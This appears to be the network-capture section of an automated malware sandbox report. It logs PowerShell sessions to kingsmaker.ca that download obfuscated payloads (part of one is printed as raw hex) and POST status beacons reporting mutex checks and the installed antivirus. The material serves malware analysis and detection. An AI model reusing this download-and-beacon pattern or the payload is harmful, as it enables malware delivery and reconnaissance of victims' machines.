                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fedhSU3qqdHvOhD%2F6qe2hw8rX0471sZFvipgrFH1BgHyYwbeIV9JxTDr6RBU1FRpWpJla7zAHfLXiO6izf75IHdVAwGXxKUPwNT0SMgLGL7zpcQwNw5dpViwAmJQi7pxOSL2yn1V%2Bgnz"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=32004&min_rtt=1013&rtt_var=33586&sent=19552&recv=9545&lost=0&retrans=0&sent_bytes=27515010&recv_bytes=287020&delivery_rate=47135761&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e48be9417c87-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2024&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1246&delivery_rate=1434184&cwnd=199&unsent_bytes=0&cid=176f4149e6c57a12&ts=1001&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.549708104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:32 UTC364OUTGET /file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            2024-11-29 07:30:33 UTC1113INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:33 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 21706
                                                                                                                            Connection: close
                                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4H2QfnFWn13x2d9Sikpiow835%2Bd1Ipiqek4BQnLlKO57rxSf0iX846NpbF4uiTLpHzTIKXaiAJh3OU1hO6G2DF3MBqhd%2B6YbvOCdr%2FvzzLtMB9T7nxfLsoD2GdbwGOuXTkjoZNxkfR8i"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8498&min_rtt=929&rtt_var=12011&sent=16145&recv=7738&lost=0&retrans=0&sent_bytes=22940111&recv_bytes=124279&delivery_rate=51477501&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e499d8df6a4e-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2063&rtt_var=786&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=1381267&cwnd=202&unsent_bytes=0&cid=15dbb009b113471f&ts=1035&x=0"
                                                                                                                            2024-11-29 07:30:33 UTC256INData Raw: 25 62 77 78 71 76 6a 6e 66 76 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 30 4b 56 58 33 30 32 62 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 65 49 71 6a 52 44 71 76 58 6c 30 6a 5b 44 71 47 54 6c 79 6b 4c 30 4b 76 58 6c 30 46 4c 46 47 59 4e 59 57 44 54 56 38 6f 52 54 4f 43 5b 31 75 53 4c 44 75 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 55 6f 5b 6a 57 7b 54 76 52 54 50 76 5b 31 30 54 50 55 65 44 54 56 38 6f 52 54 4f 43 5b 33 50 78 60 49 43 68 53 30 57 77 52 6a 65 4e
                                                                                                                            Data Ascii: %bwxqvjnfv<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#PUCMRTOC[1mEPVeKP1KhX{ORdVGYOV4XT0KVX302b1SSc3eKP1GoRTOC[1mFeIqjRDqvXl0j[DqGTlykL0KvXl0FLFGYNYWDTV8oRTOC[1uSLDuDTV8oRTOC[1qIUo[jW{TvRTPv[10TPUeDTV8oRTOC[3Px`IChS0WwRjeN
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 6c 53 59 4f 55 43 4b 50 7b 47 74 5b 44 4f 43 65 31 75 53 4c 44 75 4b 50 31 47 6f 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 53 48 52 6b 57 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 4f 59 4f 55 4b 68 4c 6f 53 72 55 47 5b 6a 63 47 6d 72 52 6c 79 6b 56 47 5b 72 58 7b 4f 53 5b 31 79 56 57 6d 4f 55 54 31 47 73 57 6d 69 4a 62 31 6d 45 4c 57 43 6a 56 47 4b 49 58 57 65 35 63 44 6d 45 54 6a 57 60 56 44 35 76 58 57 62 30 60 46 53 49 63 49 5b 68 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 47 55 6a 6d 55 4c 56 53 58 57 6c 79 4e 57 30 57 57 56 56 65 4b 60 30 4b 33 5b 45 48 30 62 33 48 78 53 6c 75 4b 52 44 35 79 56 55 4b 4e 63 46 4c 7b 55 56 65 4a 53 6d 5b 34 58 6a 4f 4b
                                                                                                                            Data Ascii: lSYOUCKP{Gt[DOCe1uSLDuKP1GoRTi{UjOqPVeKP1GoRTOC[3SHRkWme{CMRTOC[1mEPVeKP1GoRTOC[0OYOUKhLoSrUG[jcGmrRlykVG[rX{OS[1yVWmOUT1GsWmiJb1mELWCjVGKIXWe5cDmETjW`VD5vXWb0`FSIcI[h`oONP3mC[1mEPVeKP1GoRTOC[1mGUjmULVSXWlyNW0WWVVeK`0K3[EH0b3HxSluKRD5yVUKNcFL{UVeJSm[4XjOK
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 42 58 31 69 42 62 33 57 55 50 6d 6d 54 4c 54 6d 6f 56 6d 62 30 60 6c 4f 74 63 49 65 6a 53 33 79 33 58 6c 6a 34 60 30 71 59 55 6f 6d 6d 56 44 48 76 58 57 62 34 65 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 49 56 6f 5b 6b 60 54 47 77 52 6a 65 73 5b 30 43 55 50 59 65 51 64 54 47 73 58 57 4f 43 65 46 4b 48 54 56 65 4a 53 30 71 76 58 6a 65 56 50 33 57 58 54 6c 79 6b 64 55 57 4f 56 6d 62 30 63 6c 53 49 5b 7b 65 4b 50 30 4b 76 52 32 6d 7b 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 63 56 47 59 64 46 79 53 63 6c 76 76 56 6d 69 4e 58 6a 71 49 63 46 53 4b 53 45 43 6f 52 6a 65 60 62 46 4b 49 57 6a 4f 6d 56 47 4b 72 58 7b 47 7b 60 33 47 56 4c 46 65 4c 57
                                                                                                                            Data Ascii: GoRTOC[1mEPVeKdTKBX1iBb3WUPmmTLTmoVmb0`lOtcIejS3y3Xlj4`0qYUommVDHvXWb4eTSSc3eKP1GoRTOC[1mIVo[k`TGwRjes[0CUPYeQdTGsXWOCeFKHTVeJS0qvXjeVP3WXTlykdUWOVmb0clSI[{eKP0KvR2m{bDmHb14E`TGoRTOC[1mEPVeKP1GoRTORcVGYdFySclvvVmiNXjqIcFSKSECoRje`bFKIWjOmVGKrX{G{`3GVLFeLW
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 58 54 6c 38 4b 53 45 43 6f 54 33 31 34 62 46 4b 71 4c 57 47 5b 56 47 4b 77 52 54 4c 79 54 57 6d 58 54 6c 38 4b 50 30 48 76 56 6d 62 79 65 30 4b 75 4e 59 4f 60 53 30 5b 34 52 54 4c 79 53 46 47 49 63 49 4f 60 53 6a 4b 6e 5b 44 65 6f 5b 31 71 47 56 6f 43 68 53 30 5b 51 56 57 62 79 63 44 53 53 63 33 65 4b 50 31 47 6f 58 57 65 5b 5b 31 75 46 54 6c 79 6b 4c 30 47 31 57 54 65 46 4c 46 47 45 50 59 53 57 53 31 58 76 58 54 4f 43 60 30 71 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 53 4c 46 69 4c 57 6b 47 6a 57 30 54 79 56 6d 4b 52 60 54 47 71 54 6c 30 72 62 30 71 55 50 6c 79 6d 53 33 79 37 5b 44 69 4f 4f 6a 6d 45 54 6c 30 69 57 32 69 72 57 54 65 46 4c 46 47 45 52 54 34 45 5b 7b 43 4d 52 54 4f 43 5b 31
                                                                                                                            Data Ascii: XTl8KSECoT314bFKqLWG[VGKwRTLyTWmXTl8KP0HvVmbye0KuNYO`S0[4RTLySFGIcIO`SjKn[Deo[1qGVoChS0[QVWbycDSSc3eKP1GoXWe[[1uFTlykL0G1WTeFLFGEPYSWS1XvXTOC`0qucIO`WjKn[DeobDmHb14E`TGoRTOC[1mEPVeSLFiLWkGjW0TyVmKR`TGqTl0rb0qUPlymS3y7[DiOOjmETl0iW2irWTeFLFGERT4E[{CMRTOC[1
                                                                                                                            2024-11-29 07:30:33 UTC543INData Raw: 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 57 4e 52 57 4c 79 5b 47 69 56 63 44 34 59 57 57 57 5b 5b 31 6d 73 56 6f 43 68 53 30 57 6f 56 6a 65 56 62 30 71 58 54 6c 79 60 53 46 38 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 56 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 6a 6d 46 52 6c 79 6a 52 47 5b 34 58 6c 6d 43 60 33 53 48 52 6b 47 60 54 31 4b 76 58 6c 30 52 62 47 6a 78 53 6b 43 69 57 7b 57 74 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 52 54 69 6a 60 46 4f 34 50 6c 30 68 4c 30 5b 30 56 6a 4f 42 60 46 4b 75 54 56 65 60 53 30 5b 7b 56 6d 69 52 63 47 71 43 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47
                                                                                                                            Data Ascii: RTOC[1mEPVeKP1GoRTWNRWLy[GiVcD4YWWW[[1msVoChS0WoVjeVb0qXTly`SF8oRje`bFKIWmG[VGKwRVbvR1mEPVeKP1GoRTOC[1mEPVeDTV8oRTOC[1mEPVeKP1GoRTOC`jmFRlyjRG[4XlmC`3SHRkG`T1KvXl0RbGjxSkCiW{WtRTiRc0qUPl0iW2irRTij`FO4Pl0hL0[0VjOB`FKuTVe`S0[{VmiRcGqCLDuKP1GoRTOC[1mEPVeKP1G
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 6f 54 55 43 6e 55 47 58 79 5b 47 65 57 4c 57 71 52 54 6c 6d 43 60 57 4b 75 63 49 4f 60 54 31 4b 73 58 6b 4b 56 64 6a 6d 49 4f 59 5b 6a 50 31 4b 72 5b 54 65 72 64 6c 53 45 50 6c 69 60 63 6d 4b 72 58 33 6d 43 60 30 5b 49 63 49 53 60 57 7b 6a 79 5b 44 5b 4e 63 47 6a 78 4e 59 57 60 52 44 30 6f 58 7b 4b 56 60 6c 48 78 4f 56 75 6b 64 55 53 71 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 5b 4a 63 46 53 48 57 6f 6d 68 60 54 47 73 56 6c 30 46 62 33 4c 78 57 56 65 69 57 7b 57 73 58 57 65 4e 60 46 53 49 63 49 57 60 64 54 48 76 58 54 65 57 5b 30 71 75 63 49 4f 60 54 31 48 7b 56 57 69 4f 5b 33 4b 75 4e 55 43 4b 53 30 71 33 5b 47 62 30 60 31 53 53 63 33 65 4b 50 31 47 6f 58 33 30 56 4c 46 53 58 52 6f 57 4b 50 30 4b 75 56 57 65 35 64 6d 71 53 4c 44 75 6c 54 55
                                                                                                                            Data Ascii: oTUCnUGXy[GeWLWqRTlmC`WKucIO`T1KsXkKVdjmIOY[jP1Kr[TerdlSEPli`cmKrX3mC`0[IcIS`W{jy[D[NcGjxNYW`RD0oX{KV`lHxOVukdUSqSGGwUjOqPVeKP1GpRT[JcFSHWomh`TGsVl0Fb3LxWVeiW{WsXWeN`FSIcIW`dTHvXTeW[0qucIO`T1H{VWiO[3KuNUCKS0q3[Gb0`1SSc3eKP1GoX30VLFSXRoWKP0KuVWe5dmqSLDulTU
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 64 49 43 5b 4c 6c 79 72 58 7b 47 35 57 46 57 58 55 6b 43 60 57 7b 43 76 55 46 75 4e 65 6c 4b 74 55 6c 79 68 63 6d 4b 53 58 33 31 34 65 46 4f 48 54 6a 4f 60 57 33 69 6e 5b 46 30 72 65 6c 4f 73 53 6c 75 68 57 33 79 30 55 32 62 76 52 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 6a 53 55 53 59 53 58 57 6b 47 60 57 47 5b 72 53 6a 65 4b 50 30 4b 76 58 7b 47 56 50 6d 44 76 4e 59 65 60 57 7b 50 32 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 4b 76 56 6c 6d 6f 60 33 47 58 55 6d 5b 53 57 54 34 50 58 31 65 56 65 54 6d 45 4c 56 79 6b 54 31 47 32 52 30 44 76 52 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 54 55 43 6e 55 47 58 79 5b 47 65 57 4c 57 71 52 54 6c 6d 43 60 56 44 78 4e 46 65 5b 4c 6a 5b 30 52 54 65 4a 4f 56 4f
                                                                                                                            Data Ascii: dIC[LlyrX{G5WFWXUkC`W{CvUFuNelKtUlyhcmKSX314eFOHTjO`W3in[F0relOsSluhW3y0U2bvR1mEPVeKRECNP3mC[1mEPjSUSYSXWkG`WG[rSjeKP0KvX{GVPmDvNYe`W{P2SGGwUjOqPVeKP1KvVlmo`3GXUm[SWT4PX1eVeTmELVykT1G2R0DvR1mEPVeKRIONP3mC[1mEPVeKP1GoTUCnUGXy[GeWLWqRTlmC`VDxNFe[Lj[0RTeJOVO
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 6b 43 56 50 6d 50 79 53 6a 4f 68 53 54 5b 48 57 57 57 46 58 57 57 57 52 6f 4f 53 57 56 53 46 54 57 54 30 50 6d 47 75 65 44 4b 52 4c 45 47 42 57 46 79 46 50 33 4b 57 53 6a 69 56 57 54 5b 51 57 57 57 4a 63 30 47 57 54 6a 4b 53 57 55 6d 52 54 56 30 72 50 6d 48 79 63 44 4b 54 4c 54 5b 45 58 57 57 46 53 57 4f 57 53 6a 38 6a 4c 44 57 37 54 57 57 52 55 6d 47 56 62 47 4b 53 63 59 69 42 54 6b 43 56 50 6d 65 75 5b 44 4b 4e 57 54 5b 47 54 57 57 46 54 47 57 57 53 59 69 53 57 57 4b 42 54 57 5b 72 63 6d 47 54 52 6a 4b 52 53 32 53 42 57 46 30 6a 50 33 4b 57 53 6a 69 56 57 54 5b 4e 57 57 57 46 4c 30 47 57 5b 44 34 53 57 6c 76 7b 54 57 53 56 50 6d 48 79 53 6a 4b 59 57 33 53 42 5b 56 75 46 53 57 6a 76 53 6a 38 53 57 54 57 35 54 57 57 6a 52 6d 47 57 4f 57 4b 53 56 46 69 42
                                                                                                                            Data Ascii: kCVPmPySjOhST[HWWWFXWWWRoOSWVSFTWT0PmGueDKRLEGBWFyFP3KWSjiVWT[QWWWJc0GWTjKSWUmRTV0rPmHycDKTLT[EXWWFSWOWSj8jLDW7TWWRUmGVbGKScYiBTkCVPmeu[DKNWT[GTWWFTGWWSYiSWWKBTW[rcmGTRjKRS2SBWF0jP3KWSjiVWT[NWWWFL0GW[D4SWlv{TWSVPmHySjKYW3SB[VuFSWjvSj8SWTW5TWWjRmGWOWKSVFiB
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 4b 55 57 54 5b 42 56 6b 43 46 53 47 47 57 53 6a 71 53 57 54 5b 78 54 57 57 6a 4c 30 47 59 52 6b 4f 53 63 55 57 42 54 6d 53 42 50 6d 65 72 53 6a 4f 6d 60 31 5b 4b 57 47 57 46 56 6d 57 57 52 6f 57 53 57 56 53 56 54 57 65 4e 4c 30 47 59 5b 44 4b 53 4c 31 34 42 57 54 5b 46 50 6d 6e 76 53 6a 53 57 57 54 5b 70 5b 45 43 4b 65 30 47 57 60 44 71 53 57 31 5b 52 54 56 34 56 50 6d 48 78 55 6a 4b 57 57 33 53 45 5b 46 75 46 52 47 57 57 53 6c 79 57 57 54 54 7b 54 57 57 47 65 30 47 57 55 6c 34 53 57 33 53 42 54 55 43 46 50 6d 4f 57 53 6a 4b 60 4c 44 5b 44 57 57 57 46 60 57 47 57 52 6b 4b 53 57 56 53 70 54 57 5b 52 54 6d 47 75 64 44 4b 55 53 55 47 42 56 55 4f 6a 50 33 47 47 53 6a 69 5b 4c 44 5b 69 57 57 57 4a 4f 6d 47 57 55 6a 4b 53 57 59 50 7b 54 57 53 72 50 6d 44 76 53
                                                                                                                            Data Ascii: KUWT[BVkCFSGGWSjqSWT[xTWWjL0GYRkOScUWBTmSBPmerSjOm`1[KWGWFVmWWRoWSWVSVTWeNL0GY[DKSL14BWT[FPmnvSjSWWT[p[ECKe0GW`DqSW1[RTV4VPmHxUjKWW3SE[FuFRGWWSlyWWTT{TWWGe0GWUl4SW3SBTUCFPmOWSjK`LD[DWWWF`WGWRkKSWVSpTW[RTmGudDKUSUGBVUOjP3GGSji[LD[iWWWJOmGWUjKSWYP{TWSrPmDvS
                                                                                                                            2024-11-29 07:30:33 UTC1369INData Raw: 46 50 6d 6e 76 53 6a 53 53 57 54 5b 4a 54 57 57 4a 52 30 47 57 58 7b 43 53 57 30 4b 74 54 56 34 60 50 6d 48 7b 55 6a 4b 59 63 44 5b 42 5b 44 57 46 53 30 6a 76 53 6c 47 57 57 54 71 76 54 57 57 60 52 6d 47 56 62 47 4b 53 63 6c 69 42 54 31 5b 56 50 6d 65 72 53 6a 4f 6d 60 31 5b 4b 57 57 57 46 52 6d 47 57 53 6b 43 53 57 57 71 56 54 57 65 4e 63 6d 47 74 50 6a 4b 53 4c 44 5b 42 54 33 75 46 50 31 30 57 53 6a 6d 55 57 54 5b 6e 57 57 57 46 63 6d 47 57 55 59 65 53 57 6d 4b 52 54 56 30 35 50 6d 4f 46 53 6a 4b 5b 57 54 5b 45 5b 46 75 46 52 47 57 57 53 6a 71 53 57 54 71 52 54 57 57 6b 4f 47 47 59 55 6b 4f 53 60 6a 4b 42 54 55 43 46 50 6d 53 46 53 6a 4f 55 57 54 5b 48 57 6d 57 46 56 6d 57 57 52 6f 4b 53 57 56 53 56 54 57 65 4e 63 6d 47 74 62 44 4b 53 4c 44 5b 42 54 33
                                                                                                                            Data Ascii: FPmnvSjSSWT[JTWWJR0GWX{CSW0KtTV4`PmH{UjKYcD[B[DWFS0jvSlGWWTqvTWW`RmGVbGKScliBT1[VPmerSjOm`1[KWWWFRmGWSkCSWWqVTWeNcmGtPjKSLD[BT3uFP10WSjmUWT[nWWWFcmGWUYeSWmKRTV05PmOFSjK[WT[E[FuFRGWWSjqSWTqRTWWkOGGYUkOS`jKBTUCFPmSFSjOUWT[HWmWFVmWWRoKSWVSVTWeNcmGtbDKSLD[BT3


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.549709104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:35 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3e HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 85
                                                                                                                            2024-11-29 07:30:35 UTC85OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
                                                                                                                            2024-11-29 07:30:36 UTC1005INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:36 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1BgmAUJSi2YlicavlYC8Ky%2BjqL%2FPD7FMen8Sy3D1RKSnlXt%2BuO4BCLcVjQ9YHQJFlqdIVkwC%2FIDHGs%2BdL0s8hnwkQ9sy89Cnnv4A6e1sTeknWc%2BCv9ztnqMOpkUfnE18HWGPzOEsPA%2Bo"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7626&min_rtt=1071&rtt_var=10893&sent=14135&recv=6705&lost=0&retrans=0&sent_bytes=20120823&recv_bytes=130560&delivery_rate=39735399&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e4afba0643ac-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1570&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1028&delivery_rate=1782661&cwnd=181&unsent_bytes=0&cid=5bf31b624eae3111&ts=1030&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.549713104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:38 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3e HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 86
                                                                                                                            2024-11-29 07:30:38 UTC86OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
                                                                                                                            2024-11-29 07:30:39 UTC991INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:39 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5zy9YpXuV01V2UIYm6ezVTqPV9WUWlzf022a8wASiPzO22FC3FS3JaHegjQDJfC83kGrIQrqBPPNbJzBUiEIopk0FayIMcmeKOjgrgGSrEiQc8jeDXuYYot06yMLK75k8Wx42OjfZu2c"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=42957&min_rtt=1062&rtt_var=16743&sent=20623&recv=9698&lost=0&retrans=0&sent_bytes=28914453&recv_bytes=331074&delivery_rate=37512408&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e4bf0f994249-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1719&rtt_var=843&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1029&delivery_rate=1161495&cwnd=230&unsent_bytes=0&cid=440280fd45f8c834&ts=996&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.549714104.21.75.1704437064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:38 UTC388OUTGET /file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-29 07:30:39 UTC1118INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:39 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 78011
                                                                                                                            Connection: close
                                                                                                                            content-disposition: attachment; filename=file; filename*=UTF-8''file
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2F%2F3%2Bf%2FwJ4un5x2%2Bj931jAbmPz0vpwtYvKZnHxmjcAq%2BXmtBjWruW7XJvnahbzphoJpjEs7zg8EZqatmgQ22E0YZ9cFkW7yhElPoWiRDJcs4vGiIQWeFDmdUNruqS5LH1RkFdTcFZslx"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=10588&min_rtt=929&rtt_var=16688&sent=16164&recv=7747&lost=0&retrans=0&sent_bytes=22963687&recv_bytes=125788&delivery_rate=51477501&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e4bf6b3680d3-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1613&rtt_var=630&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1002&delivery_rate=1701631&cwnd=230&unsent_bytes=0&cid=ad5a1bd403fe7529&ts=1021&x=0"
